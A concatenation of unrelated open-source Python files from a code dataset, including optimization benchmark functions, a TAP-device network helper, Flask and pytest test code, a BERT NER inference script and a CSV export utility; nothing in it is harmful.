plt.plot(list(np.arange(1, len(data_CSA["Average costs CSA"]) + 1)), data_CSA["Average costs CSA"],
linewidth=4, label="CSA", color=sns.xkcd_rgb["green"])
plt.legend()
type = "ObjectiveValue"
timestamp = datetime.now()
time = str(timestamp)
plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time))
plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight')
plt.clf()
| 1.296875 | 1 |
nevergrad/functions/corefuncs.py | akhti/nevergrad | 1 | 12797552 | <reponame>akhti/nevergrad<filename>nevergrad/functions/corefuncs.py<gh_stars>1-10
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import time
from typing import Dict, Any, Tuple, List, Callable
import numpy as np
from .utils import PostponedObject
from ..instrumentation import discretization
from ..common.decorators import Registry
registry = Registry[Callable[[np.ndarray], float]]()
def _onemax(x: List[int]) -> float:
"""onemax(x) is the most classical case of discrete functions, adapted to minimization.
It is originally designed for lists of bits. It just counts the number of 1,
and returns len(x) - number of ones..
It also works in the continuous case but in that cases discretizes the
input domain by ]0.5,1.5] --> 1 and 0 everywhere else.
"""
return len(x) - sum(1 if int(round(w)) == 1 else 0 for w in x)
def _leadingones(x: List[int]) -> float:
"""leadingones is the second most classical discrete function, adapted for minimization.
Returns len(x) - number of initial 1. I.e.
leadingones([0 1 1 1]) = 4,
leadingones([1 1 1 1]) = 0,
leadingones([1 0 0 0]) = 1.
"""
for i, x_ in enumerate(list(x)):
if int(round(x_)) != 1:
return len(x) - i
return 0
def _jump(x: List[int]) -> float: # TODO: docstring?
"""There exists variants of jump functions; we are in minimization.
The principle of a jump function is that local descent does not succeed.
Jumps are necessary.
"""
n = len(x)
m = n // 4
o = n - _onemax(x)
if o == n or o <= n - m:
return n - m - o
return o # Deceptive part.
def _styblinksitang(x: np.ndarray, noise: float) -> float:
"""Classical function for testing noisy optimization."""
x = np.asarray(x)
val = np.sum(np.power(x, 4) - 16 * np.power(x, 2) + 5 * x)
# return a positive value for maximization
return float(39.16599 * len(x) + 1 * 0.5 * val + noise * np.random.normal(size=val.shape))
@registry.register
def delayedsphere(x: np.ndarray) -> float:
'''For asynchronous experiments, we induce delays.'''
time.sleep(abs(1./x[0]) / 100000. if x[0] != 0. else 0.)
return float(np.sum(x**2))
class DelayedSphere(PostponedObject):
def __call__(self, x: np.ndarray) -> float:
return float(np.sum(x**2))
def get_postponing_delay(self, args: Tuple[Any, ...], kwargs: Dict[str, Any], value: float) -> float:
x = args[0]
return float(abs(1./x[0]) / 1000.) if x[0] != 0. else 0.
registry.register(DelayedSphere())
@registry.register
def sphere(x: np.ndarray) -> float:
"""The most classical continuous optimization testbed.
If you do not solve that one then you have a bug."""
return float(np.sum(x**2))
@registry.register
def sphere1(x: np.ndarray) -> float:
"""Translated sphere function."""
return float(np.sum((x - 1.)**2))
@registry.register
def sphere2(x: np.ndarray) -> float:
"""A bit more translated sphere function."""
return float(np.sum((x - 2.)**2))
@registry.register
def sphere4(x: np.ndarray) -> float:
"""Even more translated sphere function."""
return float(np.sum((x - 4.)**2))
@registry.register
def maxdeceptive(x: np.ndarray) -> float:
dec = 3 * x**2 - (2 / (3**(x - 2)**2 + .1))
return float(np.max(dec))
@registry.register
def sumdeceptive(x: np.ndarray) -> float:
dec = 3 * x**2 - (2 / (3**(x - 2)**2 + .1))
return float(np.sum(dec))
@registry.register
def altcigar(x: np.ndarray) -> float:
"""Similar to cigar, but variables in inverse order.
E.g. for pointing out algorithms not invariant to the order of variables."""
return float(x[-1]**2 + 1000000. * np.sum(x[:-1]**2))
@registry.register
def cigar(x: np.ndarray) -> float:
"""Classical example of ill conditioned function.
The other classical example is ellipsoid.
"""
return float(x[0]**2 + 1000000. * np.sum(x[1:]**2))
@registry.register
def altellipsoid(y: np.ndarray) -> float:
"""Similar to Ellipsoid, but variables in inverse order.
E.g. for pointing out algorithms not invariant to the order of variables."""
x = y[::-1]
return sum((10**(6 * (i - 1) / float(len(x) - 1))) * (x[i]**2) for i in range(len(x)))
@registry.register
def ellipsoid(x: np.ndarray) -> float:
"""Classical example of ill conditioned function.
The other classical example is cigar.
"""
return sum((10**(6 * (i - 1) / float(len(x) - 1))) * (x[i]**2) for i in range(len(x)))
@registry.register
def rastrigin(x: np.ndarray) -> float:
"""Classical multimodal function."""
cosi = float(np.sum(np.cos(2 * np.pi * x)))
return float(10 * (len(x) - cosi) + sphere(x))
@registry.register
def hm(x: np.ndarray) -> float:
"""New multimodal function (proposed for Nevergrad)."""
return float(np.sum((x**2) * (1.1 + np.cos(1. / x))))
@registry.register
def rosenbrock(x: np.ndarray) -> float:
return sum(100.0*(x[1:] - x[:-1]**2.0)**2.0 + (1 - x[:-1])**2.0)
@registry.register
def griewank(x: np.ndarray) -> float:
"""Multimodal function, often used in Bayesian optimization."""
part1 = np.sum(x**2)
part2 = np.prod(np.cos(x / np.sqrt(1 + np.arange(len(x)))))
return 1 + (float(part1)/4000.0) - float(part2)
@registry.register
def deceptiveillcond(x: np.ndarray) -> float:
"""An extreme ill conditioned functions. Most algorithms fail on this.
The condition number increases to infinity as we get closer to the optimum."""
assert len(x) >= 2
return float(max(np.abs(np.arctan(x[1]/x[0])),
np.sqrt(x[0]**2. + x[1]**2.),
1. if x[0] > 0 else 0.) if x[0] != 0. else float("inf"))
@registry.register
def deceptivepath(x: np.ndarray) -> float:
"""A function which needs following a long path. Most algorithms fail on this.
The path becomes thiner as we get closer to the optimum."""
assert len(x) >= 2
distance = np.sqrt(x[0]**2 + x[1]**2)
if distance == 0.:
return 0.
angle = np.arctan(x[0] / x[1]) if x[1] != 0. else np.pi / 2.
invdistance = (1. / distance) if distance > 0. else 0.
if np.abs(np.cos(invdistance) - angle) > 0.1:
return 1.
return float(distance)
@registry.register
def deceptivemultimodal(x: np.ndarray) -> float:
"""Infinitely many local optima, as we get closer to the optimum."""
assert len(x) >= 2
distance = np.sqrt(x[0]**2 + x[1]**2)
if distance == 0.:
return 0.
angle = np.arctan(x[0] / x[1]) if x[1] != 0. else np.pi / 2.
invdistance = int(1. / distance) if distance > 0. else 0.
if np.abs(np.cos(invdistance) - angle) > 0.1:
return 1.
return float(distance)
@registry.register
def lunacek(x: np.ndarray) -> float:
"""Multimodal function.
Based on https://www.cs.unm.edu/~neal.holts/dga/benchmarkFunction/lunacek.html."""
problemDimensions = len(x)
s = 1.0 - (1.0 / (2.0 * np.sqrt(problemDimensions + 20.0) - 8.2))
mu1 = 2.5
mu2 = - np.sqrt(abs((mu1**2 - 1.0) / s))
firstSum = 0.0
secondSum = 0.0
thirdSum = 0.0
for i in range(problemDimensions):
firstSum += (x[i]-mu1)**2
secondSum += (x[i]-mu2)**2
thirdSum += 1.0 - np.cos(2*np.pi*(x[i]-mu1))
return min(firstSum, 1.0*problemDimensions + secondSum)+10*thirdSum
# following functions using discretization should not be used with translation/rotation
@registry.register_with_info(no_transfrom=True)
def hardonemax(y: np.ndarray) -> float:
"""Onemax, with a discretization in 2 by threshold 0 (>0 or <0)."""
return _onemax(discretization.threshold_discretization(y))
@registry.register_with_info(no_transfrom=True)
def hardjump(y: np.ndarray) -> float:
"""Hardjump, with a discretization in 2 by threshold 0 (>0 or <0)."""
return _jump(discretization.threshold_discretization(y))
@registry.register_with_info(no_transfrom=True)
def hardleadingones(y: np.ndarray) -> float:
"""Leading ones, with a discretization in 2 by threshold 0 (>0 or <0)."""
return _leadingones(discretization.threshold_discretization(y))
@registry.register_with_info(no_transfrom=True)
def hardonemax5(y: np.ndarray) -> float:
"""Hardonemax, with a discretization by 5 with 4 thresholds (quantiles of Gaussian)."""
return _onemax(discretization.threshold_discretization(y, 5))
@registry.register_with_info(no_transfrom=True)
def hardjump5(y: np.ndarray) -> float:
"""Jump, with a discretization by 5 with 4 thresholds (quantiles of Gaussian)."""
return _jump(discretization.threshold_discretization(y, 5))
@registry.register_with_info(no_transfrom=True)
def hardleadingones5(y: np.ndarray) -> float:
"""Leadingones, with a discretization by 5 with 4 thresholds (quantiles of Gaussian)."""
return _leadingones(discretization.threshold_discretization(y, 5))
@registry.register_with_info(no_transfrom=True)
def onemax(y: np.ndarray) -> float:
"""Softmax discretization of onemax (This multiplies the dimension by 2)."""
return _onemax(discretization.softmax_discretization(y))
@registry.register_with_info(no_transfrom=True)
def jump(y: np.ndarray) -> float:
"""Softmax discretization of jump (This multiplies the dimension by 2)."""
return _jump(discretization.softmax_discretization(y))
@registry.register_with_info(no_transfrom=True)
def leadingones(y: np.ndarray) -> float:
"""Softmax discretization of leadingones (This multiplies the dimension by 2)."""
return _leadingones(discretization.softmax_discretization(y))
@registry.register_with_info(no_transfrom=True)
def onemax5(y: np.ndarray) -> float:
"""Softmax discretization of onemax with 5 possibles values.
This multiplies the dimension by 5."""
return _onemax(discretization.softmax_discretization(y, 5))
@registry.register_with_info(no_transfrom=True)
def jump5(y: np.ndarray) -> float:
"""Softmax discretization of jump with 5 possibles values.
This multiplies the dimension by 5."""
return _jump(discretization.softmax_discretization(y, 5))
@registry.register_with_info(no_transfrom=True)
def leadingones5(y: np.ndarray) -> float:
"""Softmax discretization of leadingones with 5 possibles values.
This multiplies the dimension by 5."""
return _leadingones(discretization.softmax_discretization(y, 5))
@registry.register_with_info(no_transfrom=True)
def genzcornerpeak(y: np.ndarray) -> float:
"""One of the Genz functions, originally used in integration,
tested in optim because why not."""
value = float(1 + np.mean(np.tanh(y)))
if value == 0:
return float("inf")
return value**(-len(y) - 1)
@registry.register_with_info(no_transfrom=True)
def minusgenzcornerpeak(y: np.ndarray) -> float:
"""One of the Genz functions, originally used in integration,
tested in optim because why not."""
return -float(genzcornerpeak(y))
@registry.register
def genzgaussianpeakintegral(x: np.ndarray) -> float:
"""One of the Genz functions, originally used in integration,
tested in optim because why not."""
return float(np.exp(-np.sum(x**2 / 4.)))
@registry.register
def minusgenzgaussianpeakintegral(x: np.ndarray) -> float:
"""One of the Genz functions, originally used in integration,
tested in optim because why not."""
return -float(np.exp(-sum(x**2 / 4.)))
@registry.register
def slope(x: np.ndarray) -> float:
return sum(x)
@registry.register
def linear(x: np.ndarray) -> float:
return float(np.tanh(x[0]))
@registry.register
def st0(x: np.ndarray) -> float:
"""Styblinksitang function with 0 noise."""
return _styblinksitang(x, 0)
@registry.register
def st1(x: np.ndarray) -> float:
"""Styblinksitang function with noise 1."""
return _styblinksitang(x, 1)
@registry.register
def st10(x: np.ndarray) -> float:
"""Styblinksitang function with noise 10."""
return _styblinksitang(x, 10)
@registry.register
def st100(x: np.ndarray) -> float:
"""Styblinksitang function with noise 100."""
return _styblinksitang(x, 100)
| 2.515625 | 3 |
examples/live_sowemail_example.py | SoWeMail/sowerest-python | 0 | 12797560 | <gh_stars>0
import os
import sowerest
host = "http://api.sowemail.com:9000"
api_key = os.environ.get('SOWEMAIL_API_KEY')
request_headers = {
"Authorization": 'Bearer {}'.format(api_key)
}
version = 1
client = sowerest.Client(host=host,
request_headers=request_headers,
version=version)
# Send email
data = {
"personalizations": [
{
"to": [
{
"email": "<EMAIL>"
}
]
}
],
"from": {
"email": "<EMAIL>"
},
"subject": "Hello from SoWeMail",
"content": [
{
"type": "text/plain",
"value": "Simple email sending example using python's sowerest library"
}
]
}
response = client.mail.send.post(request_body=data)
print(response.status_code)
print(response.headers)
print(response.body)
| 2.078125 | 2 |
Super Ugly Number.py | quake0day/oj | 0 | 12797568 | class Solution(object):
def nthSuperUglyNumber(self, n, primes):
"""
:type n: int
:type primes: List[int]
:rtype: int
"""
res = [1]
hashmap = {val:0 for val in primes}
m = [float('inf')] * len(primes)
while len(res) < n:
newm = [res[hashmap[p]] * p for p in primes]
mn = min(newm)
hashmap[primes[newm.index(mn)]] += 1
if mn not in res:
res.append(mn)
else:
continue
return res[-1]
a = Solution()
print a.nthSuperUglyNumber(12, [2, 7, 13, 19]) | 2.328125 | 2 |
mmvmm/tap_device.py | marcsello/mmvmm | 0 | 12797576 | <filename>mmvmm/tap_device.py
#!/usr/bin/env python3
import subprocess
from threading import RLock
class TAPDevice(object):
"""
This class issues iproute2 commands to add and remove tap devices required for VM networking
"""
_allocated_device_ids = []
NAMING_SCHEME = "tap{id}"
_global_network_lock = RLock() # protects the _allocated_device_ids list, and the adding and removing of tap devices
def __init__(self, master: str):
self._active = True
with TAPDevice._global_network_lock:
self._devid = 0
while True:
if self._devid not in TAPDevice._allocated_device_ids:
break
else:
self._devid += 1
TAPDevice._allocated_device_ids.append(self._devid)
self._devname = TAPDevice.NAMING_SCHEME.format(id=self._devid)
self._masterdevname = None
subprocess.check_call(["ip", "tuntap", "add", "name", self._devname, "mode", "tap"])
subprocess.check_call(["ip", "link", "set", self._devname, "up"])
try:
self.update_master(master)
except subprocess.CalledProcessError:
self.free()
raise
def update_master(self, master: str): # This raises exception if master is not available
if not self._active:
raise RuntimeError("Device is no longer available")
with TAPDevice._global_network_lock:
subprocess.check_call(["ip", "link", "set", self._devname, "master", master])
self._masterdevname = master
@property
def device(self) -> str:
if not self._active:
raise RuntimeError("Device is no longer available")
return self._devname
@property
def master(self) -> str:
if not self._active:
raise RuntimeError("Device is no longer available")
return self._masterdevname
def free(self):
"""
Free up the tap device.
After calling this function, subsequent calls to the objects should not be made.
"""
if not self._active:
raise RuntimeError("Device is no longer available")
with TAPDevice._global_network_lock:
subprocess.check_call(["ip", "link", "set", self._devname, "down"])
subprocess.check_call(["ip", "tuntap", "del", "name", self._devname, "mode", "tap"])
TAPDevice._allocated_device_ids.remove(self._devid)
self._active = False
| 1.851563 | 2 |
linear/sym1.py | shirai708/qiita | 1 | 12797584 | <gh_stars>1-10
import matplotlib.pyplot as plt
vq = []
vp = []
h = 0.05
q = 1.0
p = 0.0
for i in range(1000):
p = p - h * q
q = q + h * p
vp.append(p)
vq.append(q)
plt.plot(vq, vp)
plt.savefig("sym1.png")
| 1.546875 | 2 |
cogs/events.py | est73/cog-example | 0 | 12797592 | from discord.ext import commands
class Events(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
print('Logged in as')
print(self.bot.user.name)
print(self.bot.user.id)
print('------')
def setup(bot):
bot.add_cog(Events(bot))
| 1.445313 | 1 |
tests/test_counter.py | benkrikler/fast-carpenter-github-test | 12 | 12797600 | import numpy as np
import pytest
from fast_carpenter.selection.filters import Counter
@pytest.fixture
def weight_names():
return [
"EventWeight",
# "MuonWeight", "ElectronWeight", "JetWeight",
]
@pytest.fixture
def counter(weight_names):
return Counter(weight_names)
def test_init(weight_names, full_wrapped_tree):
c = Counter(weight_names)
assert c._weight_names == weight_names
assert c.counts == (0, 0.0)
assert c._w_counts == (0.0)
def test_increment_mc(counter, full_wrapped_tree):
counter.increment(full_wrapped_tree, is_mc=True)
n_events = len(full_wrapped_tree)
expected_weighted_sum = 229.94895935058594
# expected value is taken from numpy sum, but awkward sum is used
# the difference is small and due to optimization
# see https://github.com/scikit-hep/awkward-1.0/issues/1241
assert counter._w_counts == pytest.approx(np.array([expected_weighted_sum]), 1e-4)
assert counter.counts == (n_events, pytest.approx(expected_weighted_sum, 1e-4))
def test_increment_data(counter, full_wrapped_tree):
counter.increment(full_wrapped_tree, is_mc=False)
n_events = len(full_wrapped_tree)
assert counter._w_counts == (n_events)
assert counter.counts == (n_events, n_events)
def test_add(counter, full_wrapped_tree):
counter.increment(full_wrapped_tree, is_mc=True)
counter.add(counter)
n_events = len(full_wrapped_tree)
expected_weighted_sum = 229.94895935058594
# expected value is taken from numpy sum, but awkward sum is used
# the difference is small and due to optimization
# see https://github.com/scikit-hep/awkward-1.0/issues/1241
assert counter._w_counts == pytest.approx((expected_weighted_sum * 2,), 2e-4)
assert counter.counts == (n_events * 2, pytest.approx(expected_weighted_sum * 2, 2e-4))
def test_increment_without_weights(full_wrapped_tree):
counter = Counter([])
counter.increment(full_wrapped_tree, is_mc=True)
n_events = len(full_wrapped_tree)
with pytest.raises(IndexError):
assert counter._w_counts[0] == n_events
assert counter.counts == (n_events, )
| 2.125 | 2 |
pterasoftware/__init__.py | camUrban/PteraSoftware | 68 | 12797608 | <gh_stars>10-100
# ToDo: Update this module's documentation.
"""This package contains all the source code for the Ptera Software.
This package contains the following subpackages:
None
This package contains the following directories:
airfoils: This folder contains a collection of airfoils whose coordinates are
stored in DAT files.
This package contains the following modules:
__init__.py: This module is this package's initialization script.
aerodynamics.py: This module contains vortex class definitions.
functions.py: This module contains functions used by other modules in the
pterasoftware package.
geometry.py: This module contains useful functions that relate to geometry,
and the class definitions for different types of geometries.
meshing.py: This module contains useful functions for creating meshes.
output.py: This module contains useful functions for visualizing solutions to
problems.
movement.py: This module contains the class definitions for the problem's movement.
current_operating_point.py: This module contains the class definition for the
problem's operating point.
problems.py: This module contains the class definitions for different types of
problems.
steady_horseshoe_vortex_lattice_method.py: This module contains the class
definition of this package's steady horseshoe vortex lattice solver.
steady_ring_vortex_lattice_method.py: This module contains the class definition
of this package's steady ring vortex lattice solver.
unsteady_ring_vortex_lattice_method.py: This module contains the class definition
of this package's unsteady ring vortex lattice solver.
"""
import pterasoftware.aerodynamics
import pterasoftware.airfoils
import pterasoftware.geometry
import pterasoftware.meshing
import pterasoftware.movement
import pterasoftware.operating_point
import pterasoftware.output
import pterasoftware.problems
import pterasoftware.steady_horseshoe_vortex_lattice_method
import pterasoftware.steady_ring_vortex_lattice_method
import pterasoftware.unsteady_ring_vortex_lattice_method
| 1.492188 | 1 |
web-component/python/admin_api/api/__init__.py | AbhiGupta03/SDK | 0 | 12797616 | <filename>web-component/python/admin_api/api/__init__.py<gh_stars>0
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from admin_api.api.auto_generate_app_token_api import AutoGenerateAppTokenApi
from admin_api.api.card_api import CardApi
from admin_api.api.client_api import ClientApi | 0.636719 | 1 |
mapfartapi/web.py | aaronr/mapfart | 3 | 12797624 | from flask import render_template
def index():
return render_template('index.html')
def documentation():
return render_template('documentation.html')
def api_landing():
return render_template('api_landing.html')
| 0.863281 | 1 |
tests/funcionales/test_formularios.py | cacao-accounting/cacao-accounting-mockup | 2 | 12797632 | <reponame>cacao-accounting/cacao-accounting-mockup<gh_stars>1-10
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contributors:
# - <NAME>
# pylint: disable=redefined-outer-name
import pytest
from cacao_accounting import create_app as app_factory
from cacao_accounting.database import database
from cacao_accounting.datos import base_data, dev_data
@pytest.fixture(scope="module", autouse=True)
def app():
from cacao_accounting.config import SQLITE
app = app_factory(
{
"SECRET_KEY": "<KEY>",
"SQLALCHEMY_DATABASE_URI": "sqlite://",
"SQLALCHEMY_TRACK_MODIFICATIONS": False,
"TESTING": True,
"WTF_CSRF_ENABLED": False,
"DEBUG": True,
"DESKTOPMODE": False,
}
)
with app.app_context():
database.drop_all()
database.create_all()
base_data()
dev_data()
app.app_context().push()
yield app
@pytest.fixture
def elimina_variable_entorno(app):
import os
if os.environ.get("CACAO_TEST"):
os.environ.pop("CACAO_TEST")
app.config["ENV"] = "production"
else:
pass
@pytest.fixture
def client(app):
return app.test_client()
@pytest.fixture
def runner(app):
return app.test_cli_runner()
class AuthActions:
def __init__(self, client):
self._client = client
def login(self):
return self._client.post("/login", data={"usuario": "cacao", "acceso": "cacao"})
def logout(self):
return self._client.get("/salir")
@pytest.fixture
def auth(client):
return AuthActions(client)
def test_formulario_nueva_entidad(client, auth):
from cacao_accounting.database import Entidad
auth.login()
response = client.get("/accounts/entity/new")
assert b"Crear Nueva Entidad." in response.data
entidad = Entidad.query.filter_by(entidad="Test Form").first()
assert entidad is None
post = client.post(
"/accounts/entity/new",
data={
"nombre_comercial": "Test Form",
"razon_social": "Test Form",
"id_fiscal": "Test Form",
"id": "Test Form",
"moneda": "NIO",
"tipo_entidad": "Asociación",
"correo_electronico": "<EMAIL>",
"web": "https://cacao.io",
"telefono1": "+505 8771 0980",
"telefono2": "+505 8661 2108",
"fax": "+505 2273 0754",
},
follow_redirects=True,
)
entidad = Entidad.query.filter_by(entidad="Test Form").first()
assert entidad is not None
assert entidad.moneda == "NIO"
assert entidad.entidad == "Test Form"
def test_formulario_editar_entidad(client, auth):
from cacao_accounting.database import Entidad
auth.login()
get = client.get("/accounts/entity/edit/dulce")
assert b"Editar Entidad." in get.data
post = client.post(
"/accounts/entity/edit/dulce",
data={
"id_fiscal": "J08100000078",
"nombre_comercial": "<NAME>",
"razon_social": "Dulces Mundo Sabor Sociedad Anonima",
"telefono1": "+506 8771 0980",
"telefono2": "+506 8667 2108",
"correo_electronico": "<EMAIL>",
"fax": "+506 7242 2789",
"web": "candy.org",
},
follow_redirects=True,
)
assert b"<NAME>" in post.data
assert b"J08100000078" in post.data
assert b"Dulces Mundo Sabor Sociedad Anonima" in post.data
assert b"+506 8771 0980" in post.data
assert b"+506 8667 2108" in post.data
assert b"<EMAIL>" in post.data
assert b"+506 7242 2789" in post.data
assert b"candy.org" in post.data
assert b"dulce" in post.data
def test_formulario_nueva_unidad(client, auth):
from cacao_accounting.database import Unidad
auth.login()
response = client.get("/accounts/unit/new")
assert b"Crear Nueva Unidad de Negocios." in response.data
unidad = Unidad.query.filter_by(unidad="Test Form").first()
assert unidad is None
post = client.post(
"/accounts/unit/new",
data={
"id": "test",
"nombre": "Test Form",
"entidad": "cacao",
"correo_electronico": "<EMAIL>",
"web": "https://cacao.io",
"telefono1": "+505 8771 0980",
"telefono2": "+505 8661 2108",
"fax": "+505 2273 0754",
},
)
unidad = Unidad.query.filter_by(unidad="test").first()
assert unidad is not None
assert unidad.entidad == "cacao"
assert unidad.unidad == "test"
| 1.570313 | 2 |
clue2020-data-lab/predict_sequence_label.py | dedeguo/knowledge_graph_construction | 0 | 12797640 | #!/usr/bin/python
# coding:utf8
"""
@author: <NAME>
@time: 2019-12-07 20:51
"""
import os
import re
import json
import tensorflow as tf
import tokenization
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
vocab_file = "./vocab.txt"
tokenizer_ = tokenization.FullTokenizer(vocab_file=vocab_file)
label2id = json.loads(open("./label2id.json").read())
id2label = [k for k, v in label2id.items()]
def process_one_example_p(tokenizer, text, max_seq_len=128):
textlist = list(text)
tokens = []
# labels = []
for i, word in enumerate(textlist):
token = tokenizer.tokenize(word)
# print(token)
tokens.extend(token)
if len(tokens) >= max_seq_len - 1:
tokens = tokens[0:(max_seq_len - 2)]
# labels = labels[0:(max_seq_len - 2)]
ntokens = []
segment_ids = []
label_ids = []
ntokens.append("[CLS]") # 句子开始设置CLS 标志
segment_ids.append(0)
for i, token in enumerate(tokens):
ntokens.append(token)
segment_ids.append(0)
# label_ids.append(label2id[labels[i]])
ntokens.append("[SEP]")
segment_ids.append(0)
input_ids = tokenizer.convert_tokens_to_ids(ntokens)
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_len:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids.append(0)
ntokens.append("**NULL**")
assert len(input_ids) == max_seq_len
assert len(input_mask) == max_seq_len
assert len(segment_ids) == max_seq_len
feature = (input_ids, input_mask, segment_ids)
return feature
def load_model(model_folder):
# We retrieve our checkpoint fullpath
try:
checkpoint = tf.train.get_checkpoint_state(model_folder)
input_checkpoint = checkpoint.model_checkpoint_path
print("[INFO] input_checkpoint:", input_checkpoint)
except Exception as e:
input_checkpoint = model_folder
print("[INFO] Model folder", model_folder, repr(e))
# We clear devices to allow TensorFlow to control on which device it will load operations
clear_devices = True
tf.reset_default_graph()
# We import the meta graph and retrieve a Saver
saver = tf.train.import_meta_graph(input_checkpoint + '.meta', clear_devices=clear_devices)
# We start a session and restore the graph weights
sess_ = tf.Session()
saver.restore(sess_, input_checkpoint)
# opts = sess_.graph.get_operations()
# for v in opts:
# print(v.name)
return sess_
model_path = "./ner_bert_base/"
sess = load_model(model_path)
input_ids = sess.graph.get_tensor_by_name("input_ids:0")
input_mask = sess.graph.get_tensor_by_name("input_mask:0") # is_training
segment_ids = sess.graph.get_tensor_by_name("segment_ids:0") # fc/dense/Relu cnn_block/Reshape
keep_prob = sess.graph.get_tensor_by_name("keep_prob:0")
p = sess.graph.get_tensor_by_name("loss/ReverseSequence_1:0")
def predict(text):
data = [text]
# 逐个分成 最大62长度的 text 进行 batch 预测
features = []
for i in data:
feature = process_one_example_p(tokenizer_, i, max_seq_len=64)
features.append(feature)
feed = {input_ids: [feature[0] for feature in features],
input_mask: [feature[1] for feature in features],
segment_ids: [feature[2] for feature in features],
keep_prob: 1.0
}
[probs] = sess.run([p], feed)
result = []
for index, prob in enumerate(probs):
for v in prob[1:len(data[index]) + 1]:
result.append(id2label[int(v)])
print(result)
labels = {}
start = None
index = 0
for w, t in zip("".join(data), result):
if re.search("^[BS]", t):
if start is not None:
label = result[index - 1][2:]
if labels.get(label):
te_ = text[start:index]
# print(te_, labels)
labels[label][te_] = [[start, index - 1]]
else:
te_ = text[start:index]
# print(te_, labels)
labels[label] = {te_: [[start, index - 1]]}
start = index
# print(start)
if re.search("^O", t):
if start is not None:
# print(start)
label = result[index - 1][2:]
if labels.get(label):
te_ = text[start:index]
# print(te_, labels)
labels[label][te_] = [[start, index - 1]]
else:
te_ = text[start:index]
# print(te_, labels)
labels[label] = {te_: [[start, index - 1]]}
# else:
# print(start, labels)
start = None
index += 1
if start is not None:
# print(start)
label = result[start][2:]
if labels.get(label):
te_ = text[start:index]
# print(te_, labels)
labels[label][te_] = [[start, index - 1]]
else:
te_ = text[start:index]
# print(te_, labels)
labels[label] = {te_: [[start, index - 1]]}
# print(labels)
return labels
def submit(path):
data = []
for line in open(path):
if not line.strip():
continue
_ = json.loads(line.strip())
res = predict(_["text"])
data.append(json.dumps({"label": res}, ensure_ascii=False))
open("ner_predict.json", "w").write("\n".join(data))
if __name__ == "__main__":
text_ = "梅塔利斯在乌克兰联赛、杯赛及联盟杯中保持9场不败,状态相当出色;"
res_ = predict(text_)
print(res_)
submit("data/thuctc_valid.json")
| 2.109375 | 2 |
src/compas_occ/geometry/curves/_curve.py | jf---/compas_occ | 1 | 12797648 | from compas.data import Data
class Curve(Data):
"""Base class for all curves in this package."""
| 0.433594 | 0 |
app/app/util/csv_transformer.py | Oblo-cit-sci/Oblo-backend | 0 | 12797656 | <gh_stars>0
from csv import DictWriter
from datetime import datetime
from typing import List
from app.models.orm import Entry
from app.util.consts import TYPE, NAME, TERMINAL_ASPECT_TYPES, VALUE
regular_entry_base_meta_columns = [
"uuid",
"creation_ts",
"domain",
"template",
"template_version",
"type",
"last_edit_ts",
"version",
"title",
"status",
"description",
"language",
"privacy",
"license",
"image",
"attached_files",
"actors",
]
straight_grab = [
"uuid",
"creation_ts",
"domain",
"template_version",
"type",
"last_edit_ts",
"version",
"title",
"status",
"description",
"language",
"privacy",
"license",
"image",
"template_version",
]
list_item_sep = "|"
inner_value_sep = ":"
transformer = {
"uuid": lambda uuid: str(uuid),
"creation_ts": lambda ts: datetime.strftime(ts, "%Y"),
"last_edit_ts": lambda ts: datetime.strftime(ts, "%Y"),
"template": lambda template: template.title,
"actors": lambda actors: cell_separated(
list(map(lambda entry_role: entry_role.csv_format(inner_value_sep), actors))
),
}
def cell_separated(values: List[str]):
return list_item_sep.join(values)
def transform_to_csv(entry: Entry, template: Entry):
res = {}
print(
cell_separated(
list(
map(
lambda entry_role: entry_role.csv_format(inner_value_sep),
entry.actors,
)
)
)
)
for col in regular_entry_base_meta_columns:
# if col in straight_grab:
val = getattr(entry, col)
if not val:
val = ""
if col in transformer:
val = transformer[col](val)
res[col] = val
# temp file method. doesnt work atm
# fp = tempfile.TemporaryFile()
# bh = list(map(lambda v: v.encode("utf-8"), regular_entry_base_meta_columns))
no_t = open("t.csv", "w")
writer = DictWriter(no_t, regular_entry_base_meta_columns)
# print(bh)
# print(writer.fieldnames)
writer.writeheader()
writer.writerow(res)
no_t.close()
csv_text = open("t.csv").read()
# temp file method...
# fp.seek(0)
# csv_text = fp.read()
for aspect in template.aspects:
res = resolve_values(aspect, entry.values[aspect.name])
return csv_text
def resolve_values(aspect, value):
a_name = aspect.get(NAME)
a_type = aspect[TYPE]
if a_type in TERMINAL_ASPECT_TYPES:
return {a_name: value[VALUE]}
| 1.765625 | 2 |
btk20_src/lib/pykaldiarkio.py | musiclvme/distant_speech_recognition | 136 | 12797664 | <reponame>musiclvme/distant_speech_recognition<filename>btk20_src/lib/pykaldiarkio.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# MIT License
#
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
